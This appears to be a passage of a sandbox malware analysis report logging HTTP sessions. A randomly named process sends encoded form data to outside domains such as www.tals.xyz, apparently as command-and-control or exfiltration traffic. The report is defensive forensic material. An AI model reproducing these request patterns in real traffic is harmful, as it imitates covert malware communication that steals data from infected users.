                                                    Data Ascii: StWXF0Jx=qIFrh6DHdiyI2vLCCbnR0rXnp8DqzR7Hf0LBkCqfkLNeDSnOy19ShGDLQ7iw/Efvcv8Sos7v6VVnYVtzp4SUux5SHg3dw3KmLWiCYJGN8OVzuBO973g36rLloS9Jgo7AdRqZBL6eBWcLi0DNDpZgymX6OsUof48UYjhgdo7biqV9SqNMdvKViwW92ImAIDyDEQZpdVblbitBjNqfq9oVR/3RQwKtMR4TcwT2rr4rhXuT6kKvCf00HMTgmd53nQ2Z9GQoPF8pltP2JoTRXVM1PLFPYOlCKm4Mskj4uoy4i103qvt7MJcb36wMoYm+dVOeRzLoej8VPIuqZDaRmPjXThGwYyDGmU3jQkiKcm65/Mtcenb/PF5Ljm1N5dolVgfiecoQZUmGQwVLdgVHZG4K7n+voJlLRvO6tDMS9dbFEz3i5TJWcY/KZFBU2TR0xIIRfoc9+XHJ5RHldS8zPo5UF52gdnil1oxFKUvoSX0IcnxQZxnRDMQapVbuFZAKmGB28mmUebZNz9LJxm8tfPsFhW0XtoA+hVEMcbNDxD3gBAV32BuhjwIHdpf7bkXzCU0HRTaq0evVK3V/v13h9jy0wREDBKILVeBOCBLVQwTOWe9jSDqjEW4rfZr54HONofPvoLfDMJ8zzPh0n9CN1NoVhOt3tY+CK8cQb3qHHylS2aFPn3ESVNEHOroyG08EHqdVgT/JT5snG49eFzYlejw8H9W5g+i0OPvzZmSJGkfa/LfDJVuKV+qfMCmGJgMBWhBJjk+IZqEIgeXfIySLwm9L/RoGlGmh2XLGQlSQJWtL2hDtJxrdCf0ejsUk4X3GYEiwhE8/TKfyYQiEKUb11Oqjks2PhmMq4bMIoNuhvm8llJI/Llqa2jBmZM3wjxwFNuY8DwSps8a2xLnzodeVHia8uh+B6J1sV1u+bzLJ133GMZL94lavoj4KgfDEHGn//QPJophA0J5PSXBlVMbioWPh9bAbkykWRPGDyA86fmP3Bg1 [TRUNCATED]
                                                    Nov 21, 2024 16:18:24.519996881 CET1236INHTTP/1.1 404 Not Found
                                                    content-type: text/html; charset=UTF-8
                                                    x-request-id: ed04a8f0-3ab8-4ec9-8771-a218b09400f0
                                                    x-runtime: 0.038671
                                                    content-length: 18183
                                                    connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                    Nov 21, 2024 16:18:24.520073891 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                    Nov 21, 2024 16:18:24.520128965 CET1236INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                    Nov 21, 2024 16:18:24.520181894 CET1236INData Raw: 0a 20 20 20 20 76 61 72 20 74 6f 67 67 6c 65 53 65 73 73 69 6f 6e 44 75 6d 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 73 65 73 73 69 6f 6e 5f 64 75 6d 70 27 29 3b 0a 20 20 20
                                                    Data Ascii: var toggleSessionDump = function() { return toggle('session_dump'); } var toggleEnvDump = function() { return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="c
                                                    Nov 21, 2024 16:18:24.520221949 CET1236INData Raw: 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74 69 6f 6e 73 2e 72 62 3a 33 33 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65
                                                    Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                                    Nov 21, 2024 16:18:24.520256042 CET1236INData Raw: 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61
                                                    Data Ascii: a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110:in `call&#
                                                    Nov 21, 2024 16:18:24.520289898 CET1236INData Raw: 72 61 6d 65 2d 69 64 3d 22 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 73 68 6f 77 5f 65 78 63 65 70 74
                                                    Data Ascii: rame-id="1" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a>
                                                    Nov 21, 2024 16:18:24.520323992 CET1236INData Raw: 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 65 78 65 63 75 74 6f 72 2e 72 62 3a 31 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d
                                                    Data Ascii: patch/middleware/executor.rb:14:in `call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">r
                                                    Nov 21, 2024 16:18:24.520356894 CET1236INData Raw: 2f 20 41 64 64 20 63 6c 69 63 6b 20 6c 69 73 74 65 6e 65 72 73 20 66 6f 72 20 61 6c 6c 20 73 74 61 63 6b 20 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e
                                                    Data Ascii: / Add click listeners for all stack frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target
                                                    Nov 21, 2024 16:18:24.520392895 CET1236INData Raw: 22 5f 70 61 74 68 22 20 74 69 74 6c 65 3d 22 52 65 74 75 72 6e 73 20 61 20 72 65 6c 61 74 69 76 65 20 70 61 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68
                                                    Data Ascii: "_path" title="Returns a relative path (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <
                                                    Nov 21, 2024 16:18:24.640146971 CET1236INData Raw: 6e 79 20 6d 61 74 63 68 65 64 20 72 65 73 75 6c 74 73 20 69 6e 20 61 20 73 65 63 74 69 6f 6e 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 4e 6f 4d 61 74 63 68 28 73 65 63 74 69 6f 6e 2c 20 6e 6f 4d 61 74 63 68 54 65 78 74 29 20 7b 0a
                                                    Data Ascii: ny matched results in a section function checkNoMatch(section, noMatchText) { if (section.children.length <= 1) { section.innerHTML += noMatchText; } } // get JSON from URL and invoke callback with result f


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.549988216.40.34.41806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:25.974109888 CET531OUTGET /ejy6/?StWXF0Jx=nKtLiO3xWkrMlPGEGL30zIXLkoLy8zu8J2L8rFbijJp7RB7dx3B4j1jKRr2O123OfZ5OtYyfrlQmcwQG+aranSp3PUfv2y2fa3KrcIq96NlU6xjN1E0Tt4TY0B9th5DEOw==&zfI=jXEDeV4Xp62 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US
                                                    Host: www.sipdontshoot.net
                                                    Connection: close
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Nov 21, 2024 16:18:27.090627909 CET1236INHTTP/1.1 200 OK
                                                    x-frame-options: SAMEORIGIN
                                                    x-xss-protection: 1; mode=block
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    referrer-policy: strict-origin-when-cross-origin
                                                    content-type: text/html; charset=utf-8
                                                    etag: W/"a6122b845a4bbd54dfbf1d1738352f32"
                                                    cache-control: max-age=0, private, must-revalidate
                                                    x-request-id: 4cb8c9cf-e9e0-486b-a5fd-68d052b450c1
                                                    x-runtime: 0.005369
                                                    transfer-encoding: chunked
                                                    connection: close
                                                    Data Raw: 31 34 42 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 33 43 62 61 56 76 77 2d 49 37 4d 6c 72 6d 6d 6d 48 7a 30 62 66 62 6b 6f 37 6f 4d 43 57 31 6d 6e 32 75 36 35 75 57 73 57 57 42 38 27 20 6e 61 6d 65 3d 27 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 27 20 6e 61 6d 65 3d 27 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 64 61 74 61 [TRUNCATED]
                                                    Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>sipdontshoot.net is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=p
                                                    Nov 21, 2024 16:18:27.090663910 CET224INData Raw: 61 72 6b 65 64 22 3e 3c 69 6d 67 20 77 69 64 74 68 3d 22 31 30 32 22 20 68 65 69 67 68 74 3d 22 33 30 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 68 76 5f 6c 6f 67 6f 5f 72 65 74 69 6e 61 2d 36 61 32 62 61 38 33 35 30 39 30 37 64 34 61 31 37 62
                                                    Data Ascii: arked"><img width="102" height="30" src="/assets/hv_logo_retina-6a2ba8350907d4a17bfc7863c2f1378e38a53bd22b790c69c14143b0f9ce45ca.png" /></a></header><main><h1>sipdontshoot.net</h1><h2>is a totally awesome idea still bein
                                                    Nov 21, 2024 16:18:27.090706110 CET1236INData Raw: 67 20 77 6f 72 6b 65 64 20 6f 6e 2e 3c 2f 68 32 3e 0a 3c 70 20 63 6c 61 73 73 3d 27 62 69 67 27 3e 43 68 65 63 6b 20 62 61 63 6b 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 0a 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e
                                                    Data Ascii: g worked on.</h2><p class='big'>Check back later.</p><form action='https://www.hover.com/domains/results' method='get'><input name='source' type='hidden' value='parked'><input name='q' placeholder='Find a domain for your own great idea.'
                                                    Nov 21, 2024 16:18:27.090794086 CET1236INData Raw: 73 6f 75 72 63 65 3d 70 61 72 6b 65 64 22 3e 59 6f 75 72 20 41 63 63 6f 75 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6e 61 76 3e 0a 3c 6e 61 76 20 63 6c 61 73 73 3d 27 73 6f 63 69 61 6c 27 3e 0a 3c 75 6c 3e 0a 3c 6c 69 3e 3c 61
                                                    Data Ascii: source=parked">Your Account</a></li></ul></nav><nav class='social'><ul><li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform
                                                    Nov 21, 2024 16:18:27.090828896 CET1236INData Raw: 33 32 2c 32 39 2e 32 38 37 31 36 20 2d 35 2e 37 36 37 37 33 2c 2d 30 2e 31 38 32 36 35 20 2d 31 31 2e 31 39 33 33 31 2c 2d 31 2e 37 36 35 36 35 20 2d 31 35 2e 39 33 37 31 36 2c 2d 34 2e 34 30 30 38 33 20 2d 30 2e 30 30 34 2c 30 2e 31 34 36 36 33
                                                    Data Ascii: 32,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.6
                                                    Nov 21, 2024 16:18:27.090867043 CET1236INData Raw: 30 20 2d 31 30 35 2e 35 74 30 2e 35 20 2d 37 36 2e 35 74 2d 30 2e 35 20 2d 37 36 2e 35 74 30 20 2d 31 30 35 2e 35 74 33 20 2d 39 36 2e 35 74 31 30 20 2d 31 30 33 74 31 38 2e 35 20 2d 37 31 2e 35 71 32 30 20 2d 35 30 20 35 38 20 2d 38 38 74 38 38
                                                    Data Ascii: 0 -105.5t0.5 -76.5t-0.5 -76.5t0 -105.5t3 -96.5t10 -103t18.5 -71.5q20 -50 58 -88t88 -58q29 -11 71.5 -18.5t103 -10t96.5 -3t105.5 0t76.5 0.5 t76.5 -0.5t105.5 0t96.5 3t103 10t71.5 18.5q50 20 88 58t58 88q11 29 18.5 71.5t10 103t3 96.5t0 105.5t-0.5 7
                                                    Nov 21, 2024 16:18:27.090895891 CET82INData Raw: 2d 34 31 37 31 33 33 38 2d 34 33 27 2c 20 27 61 75 74 6f 27 29 3b 0a 20 20 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: -4171338-43', 'auto'); ga('send', 'pageview');</script></body></html>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.54998913.248.169.48806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:32.802555084 CET771OUTPOST /stx5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 209
                                                    Origin: http://www.tals.xyz
                                                    Referer: http://www.tals.xyz/stx5/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 76 6b 6e 47 63 49 4d 69 30 73 36 47 76 77 53 5a 36 36 41 50 47 73 67 44 47 6e 37 77 42 54 41 79 6d 2b 38 7a 65 43 63 77 4b 49 68 70 34 72 36 38 6c 71 50 58 7a 58 4e 61 44 63 4f 49 33 37 4f 31 45 67 53 62 73 70 36 72 79 47 54 34 66 76 76 4b 48 6b 41 37 6b 61 61 66 64 46 78 43 6d 2f 45 62 76 6a 7a 76 4a 4b 6c 63 4c 36 54 6b 75 73 55 63 4d 4c 4e 48 42 47 6b 46 55 72 6b 53 77 74 42 2f 6e 2f 42 4c 44 51 72 71 4a 77 2f 2f 58 71 6c 6d 66 52 42 77 69 4e 65 41 56 37 47 4a 50 4d 6c 59 6f 76 30 35 61 71 4b 6d 4c 44 61 6a 33 6a 30 6a 63 41 6e 5a 6f 4f 67 64 68 44 4c 36 5a 35 62 66 72 66 6a 55 37 4e 6f 3d
                                                    Data Ascii: StWXF0Jx=vknGcIMi0s6GvwSZ66APGsgDGn7wBTAym+8zeCcwKIhp4r68lqPXzXNaDcOI37O1EgSbsp6ryGT4fvvKHkA7kaafdFxCm/EbvjzvJKlcL6TkusUcMLNHBGkFUrkSwtB/n/BLDQrqJw//XqlmfRBwiNeAV7GJPMlYov05aqKmLDaj3j0jcAnZoOgdhDL6Z5bfrfjU7No=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.54999013.248.169.48806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:35.477149963 CET791OUTPOST /stx5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 229
                                                    Origin: http://www.tals.xyz
                                                    Referer: http://www.tals.xyz/stx5/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 76 6b 6e 47 63 49 4d 69 30 73 36 47 67 77 69 5a 39 71 38 50 53 38 67 45 62 58 37 77 49 7a 41 2b 6d 2b 77 7a 65 44 59 67 4b 36 56 70 34 50 2b 38 6b 6f 33 58 30 58 4e 61 4d 38 4f 4a 76 62 4f 75 45 67 57 74 73 73 43 72 79 47 33 34 66 75 66 4b 47 55 38 38 69 4b 61 64 46 31 78 41 70 66 45 62 76 6a 7a 76 4a 4b 78 32 4c 36 4c 6b 76 66 4d 63 4e 71 4e 45 4c 6d 6b 43 58 72 6b 53 30 74 41 30 6e 2f 42 35 44 52 47 42 4a 79 33 2f 58 72 56 6d 65 46 74 7a 6f 4e 65 43 66 62 48 6e 47 65 45 56 71 2b 41 4c 51 4c 7a 31 4b 44 47 65 37 31 46 4a 47 69 76 78 37 75 4d 6c 78 51 44 4e 49 4a 36 32 78 38 7a 6b 6c 61 2b 4c 35 57 2b 30 75 63 76 75 51 4a 48 4f 42 65 44 41 4e 62 2b 5a
                                                    Data Ascii: StWXF0Jx=vknGcIMi0s6GgwiZ9q8PS8gEbX7wIzA+m+wzeDYgK6Vp4P+8ko3X0XNaM8OJvbOuEgWtssCryG34fufKGU88iKadF1xApfEbvjzvJKx2L6LkvfMcNqNELmkCXrkS0tA0n/B5DRGBJy3/XrVmeFtzoNeCfbHnGeEVq+ALQLz1KDGe71FJGivx7uMlxQDNIJ62x8zkla+L5W+0ucvuQJHOBeDANb+Z


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.54999113.248.169.48806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:38.147913933 CET1808OUTPOST /stx5/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.tals.xyz
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1245
                                                    Origin: http://www.tals.xyz
                                                    Referer: http://www.tals.xyz/stx5/
                                                    User-Agent: NetFront/4.2 (BMP 1.0.4; U; en-us; LG; NetFront/4.2/WAP) PayLo LN280-PLB MMP/2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1
                                                    Data Raw: 53 74 57 58 46 30 4a 78 3d 76 6b 6e 47 63 49 4d 69 30 73 36 47 67 77 69 5a 39 71 38 50 53 38 67 45 62 58 37 77 49 7a 41 2b 6d 2b 77 7a 65 44 59 67 4b 36 74 70 34 61 71 38 6b 4a 33 58 31 58 4e 61 42 63 4f 4d 76 62 50 32 45 67 75 78 73 73 47 37 79 45 2f 34 66 49 72 4b 4f 47 59 38 73 4b 61 64 4d 56 78 46 6d 2f 45 4b 76 6a 6a 72 4a 4b 68 32 4c 36 4c 6b 76 59 30 63 45 62 4e 45 4e 6d 6b 46 55 72 6b 65 77 74 42 54 6e 2f 5a 70 44 52 79 33 4a 43 58 2f 5a 72 46 6d 63 77 42 7a 31 39 65 45 63 62 48 4a 47 65 4a 56 71 2b 74 77 51 4c 47 75 4b 42 47 65 35 77 77 67 56 32 76 4f 34 2b 6f 6d 36 52 33 36 52 2b 69 45 32 39 54 7a 6b 4b 65 78 37 69 2f 61 6a 73 58 7a 5a 6f 4f 61 59 70 58 34 46 65 36 4e 35 36 55 72 55 74 70 41 57 57 72 71 6e 5a 6e 58 66 74 4c 79 58 74 4d 31 37 37 51 2f 4d 6f 31 4a 62 58 61 35 6f 6c 6a 59 76 32 2f 38 63 6a 37 65 36 39 46 4d 35 4c 56 4f 2f 43 6c 63 38 6f 6c 62 59 7a 65 73 49 64 7a 68 57 7a 41 50 76 4d 2b 6b 56 6c 79 34 71 6b 77 68 4d 47 47 58 46 32 65 67 65 31 55 4f 55 75 51 62 4d 49 74 44 64 [TRUNCATED]
                                                    Data Ascii: StWXF0Jx=vknGcIMi0s6GgwiZ9q8PS8gEbX7wIzA+m+wzeDYgK6tp4aq8kJ3X1XNaBcOMvbP2EguxssG7yE/4fIrKOGY8sKadMVxFm/EKvjjrJKh2L6LkvY0cEbNENmkFUrkewtBTn/ZpDRy3JCX/ZrFmcwBz19eEcbHJGeJVq+twQLGuKBGe5wwgV2vO4+om6R36R+iE29TzkKex7i/ajsXzZoOaYpX4Fe6N56UrUtpAWWrqnZnXftLyXtM177Q/Mo1JbXa5oljYv2/8cj7e69FM5LVO/Clc8olbYzesIdzhWzAPvM+kVly4qkwhMGGXF2ege1UOUuQbMItDdCDogMS3pAbpoPT+yR/ir6P6DyLVomrEBa1PAipr3lIhO1n5IET0OwPmzOP+atndQV3L9b7Bet7EmvnqtTWISl0mUq+zV8+EhwFy4J38dBA5xoTzeEfhzE8kvIK41Ueoze1WsHkMpl//0AU/WuxNjU6jvyj6LUt6UbmyrQoAGTBLgHergGy8BCjzYFNG0qGs/NR/J5qpVEJ6w3m/chrQTQ7E7hDDMRiyklxfYNcT5YxuCuCxgA4/TLSU6GWU5PrgIyvHfJH5rx+nrujQa6EA77utv3Hsh2UngkhjnD3AvsbDUR6H+83Bxpfb40rDZDpuvwsP/7T9l0JAjADoasXSkltzwLvD7HDmjMKog3vOjMST5Sx1KC6SKfcU0oOzkDQxES2JtXBDQRPAgvUHYEWJ9J5eo+HKbUef6dOtdKFUTWATRd2swDOqtuvJgM9Y4dKnVU6Q7rjxUXphmMDz4WkPIPLFVlDOrp6Aa/pB2vatheIJ9yaLCES2jOHD/yRgcD1w2GkIIqqtzmZZ2Ecjm61FBNDmtGWXCHBfGETMS5av6drdwRM+LAr/tKnCceUOFIFnKwi8oSoYyiUcWhzqyprgvQgkBON3pmOlYM48KAnEhXtf5mx+vDwFaGrlS5fOrs7srTrwaAueXBPz9QBMbrpEMIe523WYHMEA8N1 [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.54999213.248.169.48806308C:\Program Files (x86)\MUFnPpuRrYrwfjUjfKAuYHwNYEImJSfvrGiLWOEybpPmG\eAdBvdCMNQkVZK.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 21, 2024 16:18:40.810096025 CET523OUTGET /stx5/?zfI=jXEDeV4Xp62&StWXF0Jx=imPmf4gI1srj4STUrrMqNbgzS3ndO2Vfzd18ejlEFaVa4JSUkoHJ3l86KKOOva+7SWLQrsvslnf4fofCRXFAlseOCWBGmtkXklnnJa1INqnCq9NgN4lUNFEyHKg1xfk7mg== HTTP/1.1
